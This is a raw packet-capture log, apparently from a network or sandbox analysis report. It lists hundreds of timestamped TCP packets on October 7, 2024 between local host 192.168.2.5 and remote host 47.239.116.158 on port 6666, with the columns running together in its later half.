Oct 7, 2024 06:39:14.783283949 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783322096 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783334017 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.788398981 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.788625002 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.995728970 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.995764971 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.995798111 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.995836973 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.995928049 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.995980978 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.996011972 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.996036053 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.996043921 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.996212959 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.996828079 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.996859074 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.996892929 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.996893883 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.996927023 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.996939898 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.997618914 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.997670889 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.997684002 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.997701883 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.997735023 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.997776985 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.998461008 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.998492956 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.998522997 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.998527050 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.998565912 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.998603106 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.999252081 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.999305964 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.999320030 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.999337912 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.999509096 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.214073896 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214092970 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214107990 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214123011 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214139938 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214150906 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.214154959 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214170933 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214186907 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.214215994 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.214402914 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214416981 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214426994 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214432955 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214479923 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.214956045 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.214987040 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.215010881 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.215020895 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.215053082 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.215086937 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.215097904 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.215120077 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.215153933 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.215164900 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.215197086 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.215981960 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.216023922 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.216041088 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.216059923 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.216080904 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.216114998 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.216202974 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.216219902 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.216237068 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.216270924 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.217057943 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217072964 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217088938 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217104912 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217120886 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217122078 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.217135906 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217144966 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.217160940 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.217200994 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217233896 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.217884064 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217899084 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.217958927 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.218045950 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.218072891 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.218116999 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.432524920 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432681084 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432738066 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432744980 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.432771921 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432818890 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.432822943 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432858944 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432892084 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432925940 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432939053 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.432959080 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.432960987 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433008909 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433041096 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433052063 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433074951 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433105946 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433157921 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433159113 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433190107 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433223009 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433233023 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433257103 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433265924 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433512926 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433545113 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433593988 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433595896 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433629036 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433675051 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433679104 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433712006 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433722973 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433744907 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433775902 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433810949 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433821917 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.433845043 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.433893919 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.434423923 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434475899 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434526920 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.434526920 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434560061 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434575081 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.434593916 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434624910 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434659004 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434672117 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.434691906 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434700012 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.434726954 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.434775114 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.435230970 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435283899 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435317993 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435334921 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.435373068 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435420990 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435451984 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435470104 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.435487032 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435497046 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.435518980 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435551882 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435565948 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.435585022 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.435745001 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.436100006 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436151028 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436203003 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.436204910 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436237097 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436270952 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436283112 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.436302900 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436338902 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436350107 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:15.436373949 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:15.436418056 CEST  49709  6666  192.168.2.5  47.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651256084 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651324034 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651357889 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651375055 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651415110 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651446104 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651458979 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651480913 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651523113 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651530981 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651562929 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651611090 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651612997 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651644945 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651675940 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651685953 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651710033 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651741028 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651751041 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651777029 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651818037 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652164936 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652215004 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652256966 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652265072 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652297974 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652331114 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652339935 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652383089 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652415037 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652422905 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652447939 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652481079 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652488947 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652513981 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652545929 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652553082 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652578115 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652611017 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652628899 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652641058 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652673960 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652683973 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652709007 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652741909 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652750015 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652775049 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652815104 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652827024 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652861118 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652894974 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652905941 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652924061 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652962923 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652971983 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653022051 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653053045 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653064013 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653085947 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653116941 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653122902 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653151989 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653183937 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653202057 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653234005 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653265953 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653280973 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653296947 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653332949 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653338909 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.815026045 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:16.816505909 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:16.821400881 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:16.821469069 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.974459887 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.979527950 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:17.979661942 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.979811907 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.984661102 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.675513983 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858648062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858680964 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858695984 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858738899 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858747005 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858753920 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858772039 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858788967 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858798981 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858813047 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858838081 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858853102 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858870983 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858891010 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858908892 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.863779068 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.863794088 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.863810062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.863832951 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.908802032 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076678038 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076716900 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076751947 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076777935 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076786995 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076845884 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076881886 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076889992 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076915026 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076948881 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076957941 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076987028 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.077784061 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077836990 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077878952 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.077888012 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077920914 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077953100 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077958107 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.078654051 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078704119 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078737974 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078753948 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.078772068 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078805923 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078814983 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.078854084 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.079585075 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079617977 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079651117 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079663038 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.079684019 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079725981 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294641018 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294696093 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294747114 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294783115 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294780970 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294816971 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294848919 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294861078 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294886112 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294929981 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294953108 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295000076 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295231104 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295283079 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295315981 CEST66664973947.239.116.158192.168.2.5
